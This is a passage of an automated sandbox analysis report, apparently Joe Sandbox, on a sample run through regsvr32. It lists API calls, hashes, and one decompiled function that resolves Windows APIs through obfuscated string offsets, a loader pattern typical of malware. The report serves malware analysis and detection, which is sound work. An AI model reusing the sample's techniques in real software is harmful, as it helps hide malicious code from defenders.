                                                                                                                                                                                    0x04d71a32
                                                                                                                                                                                    0x04d719fb
                                                                                                                                                                                    0x04d71a48

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,04D7176E,0000000A,?,?), ref: 04D71986
                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04D7199C
                                                                                                                                                                                    • _snwprintf.NTDLL ref: 04D719C1
                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,04D741C0,00000004,00000000,?,?), ref: 04D719E6
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D7176E,0000000A,?), ref: 04D719FD
                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04D71A11
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D7176E,0000000A,?), ref: 04D71A29
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04D7176E,0000000A), ref: 04D71A32
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D7176E,0000000A,?), ref: 04D71A3A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1724014008-0
                                                                                                                                                                                    • Opcode ID: 0d4c5c68f111274b9d2246ed23c7e7bccf9308765e3f9a68664a40a869dcd7a0
                                                                                                                                                                                    • Instruction ID: dcf7462311c7739f9fddaba68eebdc220753c2c7cf7e71003f1649bb9257fc87
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d4c5c68f111274b9d2246ed23c7e7bccf9308765e3f9a68664a40a869dcd7a0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C21CFB2600218FFCB11AFA8EC85E9E37A8FB48354F108225FA01D7240F634AD41CB61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _write_multi_char$__aulldvrm__isleadbyte_l_write_string
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2598234172-0
                                                                                                                                                                                    • Opcode ID: b90484804f9a5c663edbee6205ac996f6f9941897c9f028d9c6d2cf9e7ffd023
                                                                                                                                                                                    • Instruction ID: 253ade471d41b7a30cf57480690d0979d09d1416bb036171240977ac903cfd00
                                                                                                                                                                                    • Opcode Fuzzy Hash: b90484804f9a5c663edbee6205ac996f6f9941897c9f028d9c6d2cf9e7ffd023
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50A17E71D0024A9AEF21EFA8D9487FDBBB4FF04328F24419DD95176294E774EA05CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E04D71AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                    				_Unknown_base(*)()* _t33;
                                                                                                                                                                                    				_Unknown_base(*)()* _t36;
                                                                                                                                                                                    				_Unknown_base(*)()* _t39;
                                                                                                                                                                                    				_Unknown_base(*)()* _t42;
                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                    				struct HINSTANCE__* _t50;
                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t56 = E04D71C8F(0x20);
                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					_t50 = GetModuleHandleA( *0x4d741d0 + 0x4d75014);
                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                    					_t29 = GetProcAddress(_t50,  *0x4d741d0 + 0x4d750e1);
                                                                                                                                                                                    					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                                    						L8:
                                                                                                                                                                                    						E04D7136A(_t56);
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						_t33 = GetProcAddress(_t50,  *0x4d741d0 + 0x4d750f1);
                                                                                                                                                                                    						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							_t36 = GetProcAddress(_t50,  *0x4d741d0 + 0x4d75104);
                                                                                                                                                                                    							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                    							if(_t36 == 0) {
                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t39 = GetProcAddress(_t50,  *0x4d741d0 + 0x4d75119);
                                                                                                                                                                                    								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									_t42 = GetProcAddress(_t50,  *0x4d741d0 + 0x4d7512f);
                                                                                                                                                                                    									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                    									if(_t42 == 0) {
                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                    									} else {
                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                    										_t46 = E04D718D1(_t56, _a12);
                                                                                                                                                                                    										_v8 = _t46;
                                                                                                                                                                                    										if(_t46 != 0) {
                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                    										} else {
                                                                                                                                                                                    											 *_a16 = _t56;
                                                                                                                                                                                    										}
                                                                                                                                                                                    									}
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                    			}












                                                                                                                                                                                    0x04d71ab3
                                                                                                                                                                                    0x04d71ab7
                                                                                                                                                                                    0x04d71b78
                                                                                                                                                                                    0x04d71abd
                                                                                                                                                                                    0x04d71ad5
                                                                                                                                                                                    0x04d71ae4
                                                                                                                                                                                    0x04d71aeb
                                                                                                                                                                                    0x04d71aef
                                                                                                                                                                                    0x04d71af2
                                                                                                                                                                                    0x04d71b70
                                                                                                                                                                                    0x04d71b71
                                                                                                                                                                                    0x04d71af4
                                                                                                                                                                                    0x04d71b01
                                                                                                                                                                                    0x04d71b05
                                                                                                                                                                                    0x04d71b08
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71b0a
                                                                                                                                                                                    0x04d71b17
                                                                                                                                                                                    0x04d71b1b
                                                                                                                                                                                    0x04d71b1e
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71b20
                                                                                                                                                                                    0x04d71b2d
                                                                                                                                                                                    0x04d71b31
                                                                                                                                                                                    0x04d71b34
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71b36
                                                                                                                                                                                    0x04d71b43
                                                                                                                                                                                    0x04d71b47
                                                                                                                                                                                    0x04d71b4a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71b4c
                                                                                                                                                                                    0x04d71b52
                                                                                                                                                                                    0x04d71b58
                                                                                                                                                                                    0x04d71b5d
                                                                                                                                                                                    0x04d71b64
                                                                                                                                                                                    0x04d71b67
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71b69
                                                                                                                                                                                    0x04d71b6c
                                                                                                                                                                                    0x04d71b6c
                                                                                                                                                                                    0x04d71b67
                                                                                                                                                                                    0x04d71b4a
                                                                                                                                                                                    0x04d71b34
                                                                                                                                                                                    0x04d71b1e
                                                                                                                                                                                    0x04d71b08
                                                                                                                                                                                    0x04d71af2
                                                                                                                                                                                    0x04d71b86

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 04D71C8F: HeapAlloc.KERNEL32(00000000,?,04D7117D,?,00000000,00000000,?,?,?,04D71810), ref: 04D71C9B
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,04D71272,?,?,?,?,00000002,00000000,?,?), ref: 04D71AC9
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 04D71AEB
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 04D71B01
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 04D71B17
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 04D71B2D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 04D71B43
                                                                                                                                                                                      • Part of subcall function 04D718D1: memset.NTDLL ref: 04D71950
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$AllocHandleHeapModulememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 426539879-0
                                                                                                                                                                                    • Opcode ID: e912fd4f817e7681afb864a0a46023b266c165d40ebf7779d53642976a56125c
                                                                                                                                                                                    • Instruction ID: 6d9f6f4a1e963998b8b86c82665d471d0f8b86044bb73bdc1a14e6aa8a29e598
                                                                                                                                                                                    • Opcode Fuzzy Hash: e912fd4f817e7681afb864a0a46023b266c165d40ebf7779d53642976a56125c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 61210EB1A0021AEFD710EF69D894E5A77ECFB05684B058626ED49C7711F734ED018FA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: MOC$csm$csm
                                                                                                                                                                                    • API String ID: 0-2232927589
                                                                                                                                                                                    • Opcode ID: 9a751069da1ca90159670499d863a10cd5c3665d7a054ee3be1b5662053c20d1
                                                                                                                                                                                    • Instruction ID: 887d8397c2d7b8d8705188ad9d6dae3eb04a8ab31bca2c26aa9000a4ed37a7e9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a751069da1ca90159670499d863a10cd5c3665d7a054ee3be1b5662053c20d1
                                                                                                                                                                                    • Instruction Fuzzy Hash: DC315A71A006059FEB30BE68CC847B973F8BF45209F69486FD89586311E734F585AB92
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __lock.LIBCMT ref: 04D84255
                                                                                                                                                                                      • Part of subcall function 04D883C2: __mtinitlocknum.LIBCMT ref: 04D883D6
                                                                                                                                                                                      • Part of subcall function 04D883C2: __amsg_exit.LIBCMT ref: 04D883E2
                                                                                                                                                                                      • Part of subcall function 04D883C2: RtlEnterCriticalSection.NTDLL(?), ref: 04D883EA
                                                                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 04D84260
                                                                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 04D8426F
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000001,04DE0D30,0000000C,04D883A3,00000000,04DE0DE8,0000000C,04D883DB,00000001,?,?,04D96C04,00000004,04DE12B8,0000000C), ref: 04D8429F
                                                                                                                                                                                    • GetLastError.KERNEL32(?,04D96C04,00000004,04DE12B8,0000000C,04D8B5B4,00000000,00000000,00000000,00000000,00000000,04D8AFC8,00000001,00000214), ref: 04D842B0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                                                                    • Opcode ID: fc999ebfe209afbfb1e05fd35c634b2d1ee96f41a0540c882ceaaa35344ac9bc
                                                                                                                                                                                    • Instruction ID: 28a22e1c56cc9a6f3e7c288979438ff48abc4764ebb6bd87cdac0a12babe673b
                                                                                                                                                                                    • Opcode Fuzzy Hash: fc999ebfe209afbfb1e05fd35c634b2d1ee96f41a0540c882ceaaa35344ac9bc
                                                                                                                                                                                    • Instruction Fuzzy Hash: FF016231A05316EEEF207FB1A814B7E3BA4EF00765F21411DF454AA080EA78B540EA64
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • std::locale::_Init.LIBCPMT ref: 04D820E7
                                                                                                                                                                                      • Part of subcall function 04D82E20: __EH_prolog3.LIBCMT ref: 04D82E27
                                                                                                                                                                                      • Part of subcall function 04D82E20: std::_Lockit::_Lockit.LIBCPMT ref: 04D82E3B
                                                                                                                                                                                      • Part of subcall function 04D82E20: std::locale::_Setgloballocale.LIBCPMT ref: 04D82E74
                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 04D820FD
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32 ref: 04D8212B
                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 04D82308
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LockitLockit::_std::_$std::locale::_$DirectoryH_prolog3InitSetgloballocaleWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2221243735-0
                                                                                                                                                                                    • Opcode ID: e14c0908c61d0a7eb7c74444ad00e67ffb7771af0552f91de2edab4bf32ce364
                                                                                                                                                                                    • Instruction ID: 30c8461d659da8fa1a5d21cc99b44c066374e6615d741dec7b12b80885f0e3ce
                                                                                                                                                                                    • Opcode Fuzzy Hash: e14c0908c61d0a7eb7c74444ad00e67ffb7771af0552f91de2edab4bf32ce364
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D71A571A042108BC714EF3AE86176577E9FB84714F0546ADE45A9B3C5D738B908CFA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetStringTypeW.KERNEL32(00000001,04DA4288,00000001,?,00000100,?,?,?,?,?,04D92BFE,?,?,?,?,?), ref: 04D92A45
                                                                                                                                                                                    • GetLastError.KERNEL32(?,04D92BFE,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D92A57
                                                                                                                                                                                    • _malloc.LIBCMT ref: 04D92AF1
                                                                                                                                                                                    • _memset.LIBCMT ref: 04D92B11
                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 04D92B34
                                                                                                                                                                                    • __freea.LIBCMT ref: 04D92B3E
                                                                                                                                                                                    • ___ansicp.LIBCMT ref: 04D92B68
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: StringType$ErrorLast___ansicp__freea_malloc_memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1764942736-0
                                                                                                                                                                                    • Opcode ID: e7f2afed4f9b08f265225db05fc2639b47e90b330ad868cb0462c0f9c26d33e6
                                                                                                                                                                                    • Instruction ID: 54928c1b85fcc8f75eda4531a4cee4dc5a5bb3fa5d90a72598c0e24217074eab
                                                                                                                                                                                    • Opcode Fuzzy Hash: e7f2afed4f9b08f265225db05fc2639b47e90b330ad868cb0462c0f9c26d33e6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7741E6B3A00105BFEF119FA4DCC59EA7FE8FB15359B110868E955C6100D774AE67CB50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 04D8B016: __getptd_noexit.LIBCMT ref: 04D8B017
                                                                                                                                                                                      • Part of subcall function 04D8B016: __amsg_exit.LIBCMT ref: 04D8B024
                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 04D8F08A
                                                                                                                                                                                    • __lock.LIBCMT ref: 04D8F09A
                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 04D8F0B7
                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(04DE4F18), ref: 04D8F0E2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2880340415-0
                                                                                                                                                                                    • Opcode ID: 43168c61f33e76f1de3953f7af7f8b4d85b5968d5701b40b6f9d71969f73b890
                                                                                                                                                                                    • Instruction ID: 8489eee48f855f5a6b41bbf49535afba6e55f45d75b872f44481781008e449b9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 43168c61f33e76f1de3953f7af7f8b4d85b5968d5701b40b6f9d71969f73b890
                                                                                                                                                                                    • Instruction Fuzzy Hash: FA016D31F04711AFEB21BB65941477DB7A0FB00B24F11414DE914AB380D778B941EBE5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 04D834EC
                                                                                                                                                                                      • Part of subcall function 04D89B05: __NMSG_WRITE.LIBCMT ref: 04D89B2C
                                                                                                                                                                                      • Part of subcall function 04D89B05: __NMSG_WRITE.LIBCMT ref: 04D89B36
                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 04D834F3
                                                                                                                                                                                      • Part of subcall function 04D89945: _strcpy_s.LIBCMT ref: 04D899B1
                                                                                                                                                                                      • Part of subcall function 04D89945: __invoke_watson.LIBCMT ref: 04D899C2
                                                                                                                                                                                      • Part of subcall function 04D89945: GetModuleFileNameA.KERNEL32(00000000,04EEA0E1,00000104,04D8AFC8,00000001,00000214), ref: 04D899DE
                                                                                                                                                                                      • Part of subcall function 04D89945: _strcpy_s.LIBCMT ref: 04D899F3
                                                                                                                                                                                      • Part of subcall function 04D89945: __invoke_watson.LIBCMT ref: 04D89A06
                                                                                                                                                                                      • Part of subcall function 04D89945: _strlen.LIBCMT ref: 04D89A0F
                                                                                                                                                                                      • Part of subcall function 04D89945: _strlen.LIBCMT ref: 04D89A1C
                                                                                                                                                                                      • Part of subcall function 04D89945: __invoke_watson.LIBCMT ref: 04D89A49
                                                                                                                                                                                      • Part of subcall function 04D89565: ___crtCorExitProcess.LIBCMT ref: 04D89569
                                                                                                                                                                                      • Part of subcall function 04D89565: ExitProcess.KERNEL32 ref: 04D89573
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04D83520
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04D83550
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __invoke_watson$AllocateExitHeapProcess_strcpy_s_strlen$FileModuleName___crt
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4108966708-0
                                                                                                                                                                                    • Opcode ID: 3141e10d5ebebd7dca04cf45d2811646957db142d5c2659d7fcd7cb43e3bc251
                                                                                                                                                                                    • Instruction ID: 81dfe20b80e5c03c501ace676479ad5e63e0aaf0bf0ab52bde816b2923651d85
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3141e10d5ebebd7dca04cf45d2811646957db142d5c2659d7fcd7cb43e3bc251
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1F0F6326042116AFB11BA25BC58B7E2B58FF05F24F2100ACFC5CE91C1D761FC8095A5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 04D8B016: __getptd_noexit.LIBCMT ref: 04D8B017
                                                                                                                                                                                      • Part of subcall function 04D8B016: __amsg_exit.LIBCMT ref: 04D8B024
                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 04D8495F
                                                                                                                                                                                      • Part of subcall function 04D8B5A1: __calloc_impl.LIBCMT ref: 04D8B5AF
                                                                                                                                                                                      • Part of subcall function 04D8B5A1: Sleep.KERNEL32(00000000,04D8AFC8,00000001,00000214), ref: 04D8B5C6
                                                                                                                                                                                    • __lock.LIBCMT ref: 04D84995
                                                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 04D849A1
                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 04D849B6
                                                                                                                                                                                      • Part of subcall function 04D85B1F: __getptd_noexit.LIBCMT ref: 04D85B1F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __getptd_noexit$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl__lock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1017034129-0
                                                                                                                                                                                    • Opcode ID: 7004d15abbc3c7589b16d438f287f64a25787b065f70fa12d57d01e5b4ceb959
                                                                                                                                                                                    • Instruction ID: e18ce885fa334c154027e14b80d85cbbb4cf4f95b24f99934cda84ef25a7505f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7004d15abbc3c7589b16d438f287f64a25787b065f70fa12d57d01e5b4ceb959
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F01931740216EAFB21BFB4984173877A0EF45754F10814DE49596280EBB5B9409B75
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%